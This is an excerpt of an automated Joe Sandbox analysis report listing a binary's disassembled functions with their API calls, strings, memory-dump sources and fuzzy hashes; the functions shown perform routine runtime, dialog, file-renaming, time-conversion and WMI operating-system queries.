                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                            • String ID: STATIC
                                                                                            • API String ID: 3820355801-1882779555
                                                                                            • Opcode ID: eb42068f0273b246d4f036030acdb72e141865b04a82e8c9e5932e2292782a2b
                                                                                            • Instruction ID: ea93e0e25ed177ac7db7af571afad5b78d345d645c677714e456304158fad8fc
                                                                                            • Opcode Fuzzy Hash: eb42068f0273b246d4f036030acdb72e141865b04a82e8c9e5932e2292782a2b
                                                                                            • Instruction Fuzzy Hash: DD11297B7453107BEA21EBB09D4AFAF767CAF94711F004512FA41A20A1DF64CF0646B5
                                                                                            Function 00A596F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00A59705
                                                                                              • Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
                                                                                              • Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4
                                                                                            • _free.LIBCMT ref: 00A59711
                                                                                            • _free.LIBCMT ref: 00A5971C
                                                                                            • _free.LIBCMT ref: 00A59727
                                                                                            • _free.LIBCMT ref: 00A59732
                                                                                            • _free.LIBCMT ref: 00A5973D
                                                                                            • _free.LIBCMT ref: 00A59748
                                                                                            • _free.LIBCMT ref: 00A59753
                                                                                            • _free.LIBCMT ref: 00A5975E
                                                                                            • _free.LIBCMT ref: 00A5976C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 44b43e25231cbe3882d293f00b536e7775d9110452bc9ef6ef6c51ea2a5dd4cd
                                                                                            • Instruction ID: c5d9552824a1001cbd76625af26117b0c7b9725f00cf71b12cebdf61b86868bd
                                                                                            • Opcode Fuzzy Hash: 44b43e25231cbe3882d293f00b536e7775d9110452bc9ef6ef6c51ea2a5dd4cd
                                                                                            • Instruction Fuzzy Hash: 7B11A27611010DAFCB01EF94CA82CDD3BB5FF18351B5154A1FE089F262DE36EA589B84
                                                                                            Function 00A52E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                            • String ID: csm$csm$csm
                                                                                            • API String ID: 322700389-393685449
                                                                                            • Opcode ID: acf91f123fd8aed87abd5d4de9de06b636a5949674e365da3c6d7d1f502ff8ca
                                                                                            • Instruction ID: 6cb8f6aea4e8dfe370035f0608e31eb8df846817e68ca1348312d347daeb0aef
                                                                                            • Opcode Fuzzy Hash: acf91f123fd8aed87abd5d4de9de06b636a5949674e365da3c6d7d1f502ff8ca
                                                                                            • Instruction Fuzzy Hash: AFB1A972800209EFCF29DFA4D981AAEBBB5FF55352F14455AEC016B202C731DA29CF91
                                                                                            Function 00A36FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A36FAA
                                                                                            • _wcslen.LIBCMT ref: 00A37013
                                                                                            • _wcslen.LIBCMT ref: 00A37084
                                                                                              • Part of subcall function 00A37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A37AAB
                                                                                              • Part of subcall function 00A37A9C: GetLastError.KERNEL32 ref: 00A37AF1
                                                                                              • Part of subcall function 00A37A9C: CloseHandle.KERNEL32(?), ref: 00A37B00
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                            • API String ID: 3122303884-3508440684
                                                                                            • Opcode ID: 32dadf8b9f19019fc6bc1c5534398bff66dcb86924046b9ceb03eb7901e6cae5
                                                                                            • Instruction ID: 9f4e71aea956ed96c505ff063995b46e1b665888cb2d0f10455195b4badd54e2
                                                                                            • Opcode Fuzzy Hash: 32dadf8b9f19019fc6bc1c5534398bff66dcb86924046b9ceb03eb7901e6cae5
                                                                                            • Instruction Fuzzy Hash: 7A4118F2D08344BAEF30E7749E82FEEB7ACAF55340F004455FA45A7182D774AA888721
                                                                                            Function 00A4B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4B610
                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A4B637
                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A4B650
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00A4B661
                                                                                            • GetDlgItem.USER32(?,00000065), ref: 00A4B66A
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A4B67E
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A4B694
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                            • String ID: LICENSEDLG
                                                                                            • API String ID: 3214253823-2177901306
                                                                                            • Opcode ID: 51210dd061fe3a6722bee513b554688512c722b42c0f2412d34bde9e4bdac36a
                                                                                            • Instruction ID: e82134485bbf53fcf6a5ca8046e74e12730c5bcd17915d9e73c23827dbdd18f0
                                                                                            • Opcode Fuzzy Hash: 51210dd061fe3a6722bee513b554688512c722b42c0f2412d34bde9e4bdac36a
                                                                                            • Instruction Fuzzy Hash: 8F21E536310215BBDA11DFA6ED4AF3B7B7DEB86B85F024015F605D60A0CF62DA029731
                                                                                            Function 00A4FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,5D2DC526,00000001,00000000,00000000,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FD99
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FE14
                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00A4FE1F
                                                                                            • _com_issue_error.COMSUPP ref: 00A4FE48
                                                                                            • _com_issue_error.COMSUPP ref: 00A4FE52
                                                                                            • GetLastError.KERNEL32(80070057,5D2DC526,00000001,00000000,00000000,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FE57
                                                                                            • _com_issue_error.COMSUPP ref: 00A4FE6A
                                                                                            • GetLastError.KERNEL32(00000000,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FE80
                                                                                            • _com_issue_error.COMSUPP ref: 00A4FE93
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 1353541977-0
                                                                                            • Opcode ID: c7fe0c7eea4be97da660bbc38ec8627fb3ab7345d9a11d99b4b74c545b8d9498
                                                                                            • Instruction ID: e44c5cd9afb00996828559c03f3766ab36589073f4215121049ba4315d3d6ffa
                                                                                            • Opcode Fuzzy Hash: c7fe0c7eea4be97da660bbc38ec8627fb3ab7345d9a11d99b4b74c545b8d9498
                                                                                            • Instruction Fuzzy Hash: B1410876A00219AFDB10DFA8CC46BAEBBF8FB84711F204239F915E7291D7749901C7A4
                                                                                            Function 00A3AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                            • API String ID: 3519838083-3505469590
                                                                                            • Opcode ID: 71b1125dae4f09dbc75a2b76d1f99774474c940d3a752355a9a9aca86abbdf19
                                                                                            • Instruction ID: 05548780db1321f499a5b51a6f1adb6e34121a383311c0a4e06b53c77f8e2467
                                                                                            • Opcode Fuzzy Hash: 71b1125dae4f09dbc75a2b76d1f99774474c940d3a752355a9a9aca86abbdf19
                                                                                            • Instruction Fuzzy Hash: 9A716971A00229AFDF14DFA4CC959AEB7B9FF89310F140559F512A72A0CB70AE02CB60
                                                                                            Function 00A39382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A39387
                                                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00A393AA
                                                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00A393C9
                                                                                              • Part of subcall function 00A3C29A: _wcslen.LIBCMT ref: 00A3C2A2
                                                                                              • Part of subcall function 00A41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00A3C116,00000000,.exe,?,?,00000800,?,?,?,00A48E3C), ref: 00A41FD1
                                                                                            • _swprintf.LIBCMT ref: 00A39465
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00A394D4
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00A39514
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                            • String ID: rtmp%d
                                                                                            • API String ID: 3726343395-3303766350
                                                                                            • Opcode ID: 4da79daa8acdb1aab001570f753e3ed4f5c6742bf8defe05f99ea0fce37c47cd
                                                                                            • Instruction ID: d0d863546a1609c6226a3f7bde7da9ed506e1a8be3c19d8c5a124c662b3dd918
                                                                                            • Opcode Fuzzy Hash: 4da79daa8acdb1aab001570f753e3ed4f5c6742bf8defe05f99ea0fce37c47cd
                                                                                            • Instruction Fuzzy Hash: AF4143B1901259A6DF21FBA0CD45EDFB37CAF55340F4048A5B649E3051EBB89BCD8B60
                                                                                            Function 00A41218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __aulldiv.LIBCMT ref: 00A4122E
                                                                                              • Part of subcall function 00A3B146: GetVersionExW.KERNEL32(?), ref: 00A3B16B
                                                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00A41251
                                                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00A41263
                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A41274
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41284
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41294
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00A412CF
                                                                                            • __aullrem.LIBCMT ref: 00A41379
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                            • String ID:
                                                                                            • API String ID: 1247370737-0
                                                                                            • Opcode ID: ce3b28ac6c1681da0f1fd1573ac39405659279cd44afb9ff3c1f662c82dd3337
                                                                                            • Instruction ID: b2adef0ce2365c79ffccf912c2ffa46761cd05246743b0d65aacffa489cb6a2c
                                                                                            • Opcode Fuzzy Hash: ce3b28ac6c1681da0f1fd1573ac39405659279cd44afb9ff3c1f662c82dd3337
                                                                                            • Instruction Fuzzy Hash: 204128B6508305AFC750DF65C88496BBBF9FF88314F008A2EF596C6610E774E649CB62
                                                                                            Function 00A32210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _swprintf.LIBCMT ref: 00A32536
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                              • Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                            • String ID: ;%u$x%u$xc%u
                                                                                            • API String ID: 3053425827-2277559157
                                                                                            • Opcode ID: ea9332d85cf75c243b5e9d503e2491a8ca0c0281282f3749793c1ee909cd2489
                                                                                            • Instruction ID: 95f9e8c4aa665e7391f62f0b3fa026c8342747dad85e6a4311bb601dece24214
                                                                                            • Opcode Fuzzy Hash: ea9332d85cf75c243b5e9d503e2491a8ca0c0281282f3749793c1ee909cd2489
                                                                                            • Instruction Fuzzy Hash: 06F12A706083409BDB25DF3889D6BFE77996F94300F08057DFD86AB283CB649945C762
                                                                                            Function 00A49CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                                                            • API String ID: 176396367-3568243669
                                                                                            • Opcode ID: 3e2dfc4d84e7e45e1db135de66f39531e1c3aa8ab7dcc250546af7c1363fa506
                                                                                            • Instruction ID: 4688859a69ff47bc29be30c5a7b7b70ef1d00877716caf92a255422f4034e5b6
                                                                                            • Opcode Fuzzy Hash: 3e2dfc4d84e7e45e1db135de66f39531e1c3aa8ab7dcc250546af7c1363fa506
                                                                                            • Instruction Fuzzy Hash: 2C51096EB4032395DB309B659C12B7773E0DFE5791F68081AFDC18B1C0FBA58CA18261
                                                                                            Function 00A5F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00A5FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00A5F6CF
                                                                                            • __fassign.LIBCMT ref: 00A5F74A
                                                                                            • __fassign.LIBCMT ref: 00A5F765
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00A5F78B
                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,00A5FE02,00000000,?,?,?,?,?,?,?,?,?,00A5FE02,00000000), ref: 00A5F7AA
                                                                                            • WriteFile.KERNEL32(?,00000000,00000001,00A5FE02,00000000,?,?,?,?,?,?,?,?,?,00A5FE02,00000000), ref: 00A5F7E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: 444f73bf2e060ce660d990d3c33ff9bd136ae137371f05fd5589b6046bb3307e
                                                                                            • Instruction ID: 1280c5156ba2191ad0664acdd1838244737f3c46626bb47d39dbeaa64c455060
                                                                                            • Opcode Fuzzy Hash: 444f73bf2e060ce660d990d3c33ff9bd136ae137371f05fd5589b6046bb3307e
                                                                                            • Instruction Fuzzy Hash: 7151C5B5E00209AFCB10CFA8DC45AEEBBF4FF09301F14416AE955E7251D770AA45CBA0
                                                                                            Function 00A52900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00A52937
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00A5293F
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00A529C8
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A529F3
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00A52A48
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: 13c276729ed91fcc1f041f910657ea8583d3e445f559a42d529db2f7819eca39
                                                                                            • Instruction ID: e744c22d984cf38f642b499565208a3b2bd8dbb5fa864052ce84b5de2759e03a
                                                                                            • Opcode Fuzzy Hash: 13c276729ed91fcc1f041f910657ea8583d3e445f559a42d529db2f7819eca39
                                                                                            • Instruction Fuzzy Hash: B041BF35A00208EFCF10DF68C881B9EBBB0BF46365F148155EC15AB392D7719A19CF90
